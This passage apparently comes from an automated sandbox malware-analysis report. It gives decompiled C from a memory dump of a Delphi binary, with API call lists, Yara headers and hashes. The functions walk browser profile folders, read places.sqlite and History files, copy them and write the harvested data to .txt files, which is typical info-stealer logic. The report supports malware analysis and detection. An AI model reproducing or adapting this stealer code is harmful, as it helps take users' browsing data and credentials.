                                                                                                                                                                                              0x00412ef7
                                                                                                                                                                                              0x00412f0d
                                                                                                                                                                                              0x00412f12
                                                                                                                                                                                              0x00412f18
                                                                                                                                                                                              0x00412f28
                                                                                                                                                                                              0x00412f39
                                                                                                                                                                                              0x00412f44
                                                                                                                                                                                              0x00412f45
                                                                                                                                                                                              0x00412f45
                                                                                                                                                                                              0x00412f4c
                                                                                                                                                                                              0x00412f4f
                                                                                                                                                                                              0x00412f4f
                                                                                                                                                                                              0x00412f6e
                                                                                                                                                                                              0x00412f7a
                                                                                                                                                                                              0x00412f81
                                                                                                                                                                                              0x00412f84
                                                                                                                                                                                              0x00412f87
                                                                                                                                                                                              0x00412f97
                                                                                                                                                                                              0x00412fa2
                                                                                                                                                                                              0x00412fb2
                                                                                                                                                                                              0x00412fbd
                                                                                                                                                                                              0x00412fcd
                                                                                                                                                                                              0x00412fdf

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                              • String ID: .txt$\*.*$\History
                                                                                                                                                                                              • API String ID: 1974802433-2232271174
                                                                                                                                                                                              • Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                                                                                                                                                                                              • Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0041303C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 139fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 44%
                                                                                                                                                                                              			E0041303C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				void* _t103;
				intOrPtr _t108;
				intOrPtr _t123;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t141;

				_t138 = __esi;
				_t137 = __edi;
				_t106 = __ebx;
				_t140 = _t141;
				_push(__ecx);
				_t108 = 0x51;
				do {
					_push(0);
					_push(0);
					_t108 = _t108 - 1;
				} while (_t108 != 0);
				_push(_t108);
				_t1 =  &_v8;
				 *_t1 = _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t140);
				_push(0x413276);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x4132a0);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x4132a0);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t106, 0x104) != 0) {
						_push(_t140);
						_push(0x4131ea);
						_push( *[fs:eax]);
						 *[fs:eax] = _t141;
						_push(_v8);
						_push(0x4132a0);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(L"\\places.sqlite");
						E00403E1C();
						E0041256C(_v644, _t106,  &_v640, _t137, _t138);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x4132a0);
						_push(_v12);
						_push(E004132CC);
						E00403D10( &_v660, 0x104,  &(_v616.cFileName));
						_push(_v660);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v652, _v656);
						_pop(_t103);
						E0040DCE8(_t103, _t106, _v652, _t137, _t138);
						_pop(_t136);
						 *[fs:eax] = _t136;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t123);
				 *[fs:eax] = _t123;
				_push(E0041327D);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}

























                                                                                                                                                                                              0x0041303c
                                                                                                                                                                                              0x0041303c
                                                                                                                                                                                              0x0041303c
                                                                                                                                                                                              0x0041303d
                                                                                                                                                                                              0x0041303f
                                                                                                                                                                                              0x00413040
                                                                                                                                                                                              0x00413045
                                                                                                                                                                                              0x00413045
                                                                                                                                                                                              0x00413047
                                                                                                                                                                                              0x00413049
                                                                                                                                                                                              0x00413049
                                                                                                                                                                                              0x0041304c
                                                                                                                                                                                              0x0041304d
                                                                                                                                                                                              0x0041304d
                                                                                                                                                                                              0x00413050
                                                                                                                                                                                              0x00413051
                                                                                                                                                                                              0x00413052
                                                                                                                                                                                              0x00413053
                                                                                                                                                                                              0x00413056
                                                                                                                                                                                              0x00413059
                                                                                                                                                                                              0x0041305f
                                                                                                                                                                                              0x00413067
                                                                                                                                                                                              0x0041306f
                                                                                                                                                                                              0x00413076
                                                                                                                                                                                              0x00413077
                                                                                                                                                                                              0x0041307c
                                                                                                                                                                                              0x0041307f
                                                                                                                                                                                              0x00413097
                                                                                                                                                                                              0x004130ad
                                                                                                                                                                                              0x004130b0
                                                                                                                                                                                              0x004130b0
                                                                                                                                                                                              0x004130b3
                                                                                                                                                                                              0x004130c9
                                                                                                                                                                                              0x004130ce
                                                                                                                                                                                              0x004130d4
                                                                                                                                                                                              0x004130e4
                                                                                                                                                                                              0x004130e9
                                                                                                                                                                                              0x004130fa
                                                                                                                                                                                              0x0041310c
                                                                                                                                                                                              0x00413114
                                                                                                                                                                                              0x00413115
                                                                                                                                                                                              0x0041311a
                                                                                                                                                                                              0x0041311d
                                                                                                                                                                                              0x00413120
                                                                                                                                                                                              0x00413123
                                                                                                                                                                                              0x00413139
                                                                                                                                                                                              0x0041313e
                                                                                                                                                                                              0x00413144
                                                                                                                                                                                              0x00413154
                                                                                                                                                                                              0x00413165
                                                                                                                                                                                              0x00413176
                                                                                                                                                                                              0x00413181
                                                                                                                                                                                              0x00413182
                                                                                                                                                                                              0x00413185
                                                                                                                                                                                              0x0041318a
                                                                                                                                                                                              0x0041318d
                                                                                                                                                                                              0x004131a3
                                                                                                                                                                                              0x004131a8
                                                                                                                                                                                              0x004131ae
                                                                                                                                                                                              0x004131be
                                                                                                                                                                                              0x004131cf
                                                                                                                                                                                              0x004131da
                                                                                                                                                                                              0x004131db
                                                                                                                                                                                              0x004131e2
                                                                                                                                                                                              0x004131e5
                                                                                                                                                                                              0x004131e5
                                                                                                                                                                                              0x00413204
                                                                                                                                                                                              0x00413210
                                                                                                                                                                                              0x00413217
                                                                                                                                                                                              0x0041321a
                                                                                                                                                                                              0x0041321d
                                                                                                                                                                                              0x0041322d
                                                                                                                                                                                              0x00413238
                                                                                                                                                                                              0x00413248
                                                                                                                                                                                              0x00413253
                                                                                                                                                                                              0x00413263
                                                                                                                                                                                              0x00413275

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                              • String ID: .txt$\*.*$\places.sqlite
                                                                                                                                                                                              • API String ID: 1974802433-3919338718
                                                                                                                                                                                              • Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                                                                                                                                              • Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
                                                                                                                                                                                              • Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                                                                                                                                              • Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00404C15, Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00404C15(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x41c5a4)) =  *((intOrPtr*)(__eax - 0x41c5a4)) + __eax - 0x41c5a4;
				 *0x41b00c = 2;
				 *0x41c010 = 0x4010b8;
				 *0x41c014 = 0x4010c0;
				 *0x41c036 = 2;
				 *0x41c000 = E00404568;
				if(E00402A94() != 0) {
					_t3 = E00402AC4();
				}
				E00402B88(_t3);
				 *0x41c03c = 0xd7b0;
				 *0x41c208 = 0xd7b0;
				 *0x41c3d4 = 0xd7b0;
				 *0x41c02c = GetCommandLineA();
				 *0x41c028 = E00401180();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x41c5a8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x41c020 = _t11;
				return _t11;
			}





                                                                                                                                                                                              0x00404c15
                                                                                                                                                                                              0x00404c1a
                                                                                                                                                                                              0x00404c1f
                                                                                                                                                                                              0x00404c21
                                                                                                                                                                                              0x00404c28
                                                                                                                                                                                              0x00404c32
                                                                                                                                                                                              0x00404c3c
                                                                                                                                                                                              0x00404c43
                                                                                                                                                                                              0x00404c54
                                                                                                                                                                                              0x00404c56
                                                                                                                                                                                              0x00404c56
                                                                                                                                                                                              0x00404c5b
                                                                                                                                                                                              0x00404c60
                                                                                                                                                                                              0x00404c69
                                                                                                                                                                                              0x00404c72
                                                                                                                                                                                              0x00404c80
                                                                                                                                                                                              0x00404c8a
                                                                                                                                                                                              0x00404c9e
                                                                                                                                                                                              0x00404cd7
                                                                                                                                                                                              0x00404ca0
                                                                                                                                                                                              0x00404cae
                                                                                                                                                                                              0x00404cc6
                                                                                                                                                                                              0x00404cb0
                                                                                                                                                                                              0x00404cb0
                                                                                                                                                                                              0x00404cb0
                                                                                                                                                                                              0x00404cae
                                                                                                                                                                                              0x00404cdc
                                                                                                                                                                                              0x00404ce1
                                                                                                                                                                                              0x00404ce6

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
                                                                                                                                                                                                • Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5
                                                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 00404C7B
                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 00404C8F
                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 00404CA0
                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00404CDC
                                                                                                                                                                                                • Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                                                                                                                • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                                                                                                                                                • Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                                                                                                                                              • GetThreadLocale.KERNEL32 ref: 00404CBC
                                                                                                                                                                                                • Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3734044017-0
                                                                                                                                                                                              • Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                                                                                                                                              • Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
                                                                                                                                                                                              • Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                                                                                                                                              • Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004111C4, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 201fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 42%
                                                                                                                                                                                              			E004111C4(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				char _v668;
				char _v672;
				char _v676;
				char _v680;
				char _v684;
				char _v688;
				intOrPtr _v692;
				char _v696;
				void* _t143;
				void* _t160;
				intOrPtr _t164;
				intOrPtr _t181;
				intOrPtr _t188;
				intOrPtr _t210;
				intOrPtr _t211;

				_t208 = __esi;
				_t207 = __edi;
				_t162 = __ebx;
				_t210 = _t211;
				_push(__ecx);
				_t164 = 0x56;
				do {
					_push(0);
					_push(0);
					_t164 = _t164 - 1;
				} while (_t164 != 0);
				_t1 =  &_v8;
				 *_t1 = _t164;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t210);
				_push(0x411542);
				_push( *[fs:eax]);
				 *[fs:eax] = _t211;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x41156c);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x41156c);
					E0040813C(0x61,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t162, 0x104) != 0) {
						_push(_t210);
						_push(0x411480);
						_push( *[fs:eax]);
						 *[fs:eax] = _t211;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x41156c);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(0x41156c);
							E0040813C(0x61,  &_v652);
							_push(_v652);
							E00403E1C();
							E00410BB8(_v644, _t162,  &_v640, _t207, _t208);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x41156c);
							_push(_v12);
							_push(E00411574);
							E00403D10( &_v664, 0x104,  &(_v616.cFileName));
							_push(_v664);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v656, _v660);
							_pop(_t160);
							E0040DCE8(_t160, _t162, _v656, _t207, _t208);
						}
						if(_a4 == 0) {
							_push(_v8);
							_push(0x41156c);
							E00403D10( &_v680, 0x104,  &(_v616.cFileName));
							_push(_v680);
							_push(0x41156c);
							E0040813C(0x61,  &_v684);
							_push(_v684);
							E00403E1C();
							E00410E70(_v676, _t162,  &_v672, _t207, _t208);
							E0040377C( &_v668, _v672);
							_push(_v668);
							_push(_v16);
							_push(0x41156c);
							_push(_v12);
							_push(E00411574);
							E00403D10( &_v696, 0x104,  &(_v616.cFileName));
							_push(_v696);
							_push(E00411574);
							_push(E0041158C);
							_push(E0041158C);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v688, _v692);
							_pop(_t143);
							E0040DCE8(_t143, _t162, _v688, _t207, _t208);
						}
						_pop(_t188);
						 *[fs:eax] = _t188;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t181);
				 *[fs:eax] = _t181;
				_push(E0041154C);
				E00403B98( &_v696, 2);
				E004034E4( &_v688);
				E00403B98( &_v684, 4);
				E004034E4( &_v668);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}



































                                                                                                                                                                                              0x004111c4
                                                                                                                                                                                              0x004111c4
                                                                                                                                                                                              0x004111c4
                                                                                                                                                                                              0x004111c5
                                                                                                                                                                                              0x004111c7
                                                                                                                                                                                              0x004111c8
                                                                                                                                                                                              0x004111cd
                                                                                                                                                                                              0x004111cd
                                                                                                                                                                                              0x004111cf
                                                                                                                                                                                              0x004111d1
                                                                                                                                                                                              0x004111d1
                                                                                                                                                                                              0x004111d4
                                                                                                                                                                                              0x004111d4
                                                                                                                                                                                              0x004111d7
                                                                                                                                                                                              0x004111d8
                                                                                                                                                                                              0x004111d9
                                                                                                                                                                                              0x004111da
                                                                                                                                                                                              0x004111dd
                                                                                                                                                                                              0x004111e0
                                                                                                                                                                                              0x004111e6
                                                                                                                                                                                              0x004111ee
                                                                                                                                                                                              0x004111f6
                                                                                                                                                                                              0x004111fd
                                                                                                                                                                                              0x004111fe
                                                                                                                                                                                              0x00411203
                                                                                                                                                                                              0x00411206
                                                                                                                                                                                              0x0041121e
                                                                                                                                                                                              0x00411234
                                                                                                                                                                                              0x00411237
                                                                                                                                                                                              0x00411237
                                                                                                                                                                                              0x0041123a
                                                                                                                                                                                              0x00411250
                                                                                                                                                                                              0x00411255
                                                                                                                                                                                              0x0041125b
                                                                                                                                                                                              0x0041126b
                                                                                                                                                                                              0x00411270
                                                                                                                                                                                              0x00411281
                                                                                                                                                                                              0x00411293
                                                                                                                                                                                              0x0041129b
                                                                                                                                                                                              0x0041129c
                                                                                                                                                                                              0x004112a1
                                                                                                                                                                                              0x004112a4
                                                                                                                                                                                              0x004112ab
                                                                                                                                                                                              0x004112b1
                                                                                                                                                                                              0x004112b4
                                                                                                                                                                                              0x004112ca
                                                                                                                                                                                              0x004112cf
                                                                                                                                                                                              0x004112d5
                                                                                                                                                                                              0x004112e5
                                                                                                                                                                                              0x004112ea
                                                                                                                                                                                              0x004112fb
                                                                                                                                                                                              0x0041130c
                                                                                                                                                                                              0x0041131d
                                                                                                                                                                                              0x00411328
                                                                                                                                                                                              0x00411329
                                                                                                                                                                                              0x0041132c
                                                                                                                                                                                              0x00411331
                                                                                                                                                                                              0x00411334
                                                                                                                                                                                              0x0041134a
                                                                                                                                                                                              0x0041134f
                                                                                                                                                                                              0x00411355
                                                                                                                                                                                              0x00411365
                                                                                                                                                                                              0x00411376
                                                                                                                                                                                              0x00411381
                                                                                                                                                                                              0x00411382
                                                                                                                                                                                              0x00411382
                                                                                                                                                                                              0x0041138b
                                                                                                                                                                                              0x00411391
                                                                                                                                                                                              0x00411394
                                                                                                                                                                                              0x004113aa
                                                                                                                                                                                              0x004113af
                                                                                                                                                                                              0x004113b5
                                                                                                                                                                                              0x004113c5
                                                                                                                                                                                              0x004113ca
                                                                                                                                                                                              0x004113db
                                                                                                                                                                                              0x004113ec
                                                                                                                                                                                              0x004113fd
                                                                                                                                                                                              0x00411408
                                                                                                                                                                                              0x00411409
                                                                                                                                                                                              0x0041140c
                                                                                                                                                                                              0x00411411
                                                                                                                                                                                              0x00411414
                                                                                                                                                                                              0x0041142a
                                                                                                                                                                                              0x0041142f
                                                                                                                                                                                              0x00411435
                                                                                                                                                                                              0x0041143a
                                                                                                                                                                                              0x0041143f
                                                                                                                                                                                              0x00411444
                                                                                                                                                                                              0x00411454
                                                                                                                                                                                              0x00411465
                                                                                                                                                                                              0x00411470
                                                                                                                                                                                              0x00411471
                                                                                                                                                                                              0x00411471
                                                                                                                                                                                              0x00411478
                                                                                                                                                                                              0x0041147b
                                                                                                                                                                                              0x0041147b
                                                                                                                                                                                              0x0041149a
                                                                                                                                                                                              0x004114a6
                                                                                                                                                                                              0x004114ad
                                                                                                                                                                                              0x004114b0
                                                                                                                                                                                              0x004114b3
                                                                                                                                                                                              0x004114c3
                                                                                                                                                                                              0x004114ce
                                                                                                                                                                                              0x004114de
                                                                                                                                                                                              0x004114e9
                                                                                                                                                                                              0x004114f9
                                                                                                                                                                                              0x00411504
                                                                                                                                                                                              0x00411514
                                                                                                                                                                                              0x0041151f
                                                                                                                                                                                              0x0041152f
                                                                                                                                                                                              0x00411541

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F
                                                                                                                                                                                                • Part of subcall function 00410E70: GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                                • Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
                                                                                                                                                                                              • String ID: .txt$\*.*
                                                                                                                                                                                              • API String ID: 4269597168-2615687548
                                                                                                                                                                                              • Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                                                                                                                                              • Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0041158C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E0041158C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				intOrPtr _v117;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				void* _t109;
				void* _t113;
				intOrPtr _t115;
				intOrPtr _t130;
				intOrPtr _t144;
				intOrPtr _t148;
				intOrPtr _t149;

				_t146 = __esi;
				_t145 = __edi;
				_t113 = __ebx + 1;
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_t148 = _t149;
				_push(__ecx);
				_t115 = 0x52;
				do {
					_push(0);
					_push(0);
					_t115 = _t115 - 1;
				} while (_t115 != 0);
				_t3 =  &_v8;
				 *_t3 = _t115;
				_push(_t113);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t3;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t148);
				_push(0x4117df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x411808);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x411808);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t113, 0x104) != 0) {
						_push(_t148);
						_push(0x411753);
						_push( *[fs:eax]);
						 *[fs:eax] = _t149;
						_push(_v8);
						_push(0x411808);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(0x411808);
						E0040813C(0x1f,  &_v652);
						_push(_v652);
						E00403E1C();
						E00410900(_v644, _t113,  &_v640, _t145, _t146);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x411808);
						_push(_v12);
						_push(E00411810);
						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
						_push(_v664);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v656, _v660);
						_pop(_t109);
						E0040DCE8(_t109, _t113, _v656, _t145, _t146);
						_pop(_t144);
						 *[fs:eax] = _t144;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t130);
				 *[fs:eax] = _t130;
				_push(E004117E6);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}




























                                                                                                                                                                                              0x0041158c
                                                                                                                                                                                              0x0041158c
                                                                                                                                                                                              0x0041158c
                                                                                                                                                                                              0x0041158d
                                                                                                                                                                                              0x0041158f
                                                                                                                                                                                              0x00411591
                                                                                                                                                                                              0x00411593
                                                                                                                                                                                              0x00411594
                                                                                                                                                                                              0x00411599
                                                                                                                                                                                              0x00411599
                                                                                                                                                                                              0x0041159b
                                                                                                                                                                                              0x0041159d
                                                                                                                                                                                              0x0041159d
                                                                                                                                                                                              0x004115a0
                                                                                                                                                                                              0x004115a0
                                                                                                                                                                                              0x004115a3
                                                                                                                                                                                              0x004115a4
                                                                                                                                                                                              0x004115a5
                                                                                                                                                                                              0x004115a6
                                                                                                                                                                                              0x004115a9
                                                                                                                                                                                              0x004115ac
                                                                                                                                                                                              0x004115b2
                                                                                                                                                                                              0x004115ba
                                                                                                                                                                                              0x004115c2
                                                                                                                                                                                              0x004115c9
                                                                                                                                                                                              0x004115ca
                                                                                                                                                                                              0x004115cf
                                                                                                                                                                                              0x004115d2
                                                                                                                                                                                              0x004115ea
                                                                                                                                                                                              0x00411600
                                                                                                                                                                                              0x00411603
                                                                                                                                                                                              0x00411603
                                                                                                                                                                                              0x00411606
                                                                                                                                                                                              0x0041161c
                                                                                                                                                                                              0x00411621
                                                                                                                                                                                              0x00411627
                                                                                                                                                                                              0x00411637
                                                                                                                                                                                              0x0041163c
                                                                                                                                                                                              0x0041164d
                                                                                                                                                                                              0x0041165f
                                                                                                                                                                                              0x00411667
                                                                                                                                                                                              0x00411668
                                                                                                                                                                                              0x0041166d
                                                                                                                                                                                              0x00411670
                                                                                                                                                                                              0x00411673
                                                                                                                                                                                              0x00411676
                                                                                                                                                                                              0x0041168c
                                                                                                                                                                                              0x00411691
                                                                                                                                                                                              0x00411697
                                                                                                                                                                                              0x004116a7
                                                                                                                                                                                              0x004116ac
                                                                                                                                                                                              0x004116bd
                                                                                                                                                                                              0x004116ce
                                                                                                                                                                                              0x004116df
                                                                                                                                                                                              0x004116ea
                                                                                                                                                                                              0x004116eb
                                                                                                                                                                                              0x004116ee
                                                                                                                                                                                              0x004116f3
                                                                                                                                                                                              0x004116f6
                                                                                                                                                                                              0x0041170c
                                                                                                                                                                                              0x00411711
                                                                                                                                                                                              0x00411717
                                                                                                                                                                                              0x00411727
                                                                                                                                                                                              0x00411738
                                                                                                                                                                                              0x00411743
                                                                                                                                                                                              0x00411744
                                                                                                                                                                                              0x0041174b
                                                                                                                                                                                              0x0041174e
                                                                                                                                                                                              0x0041174e
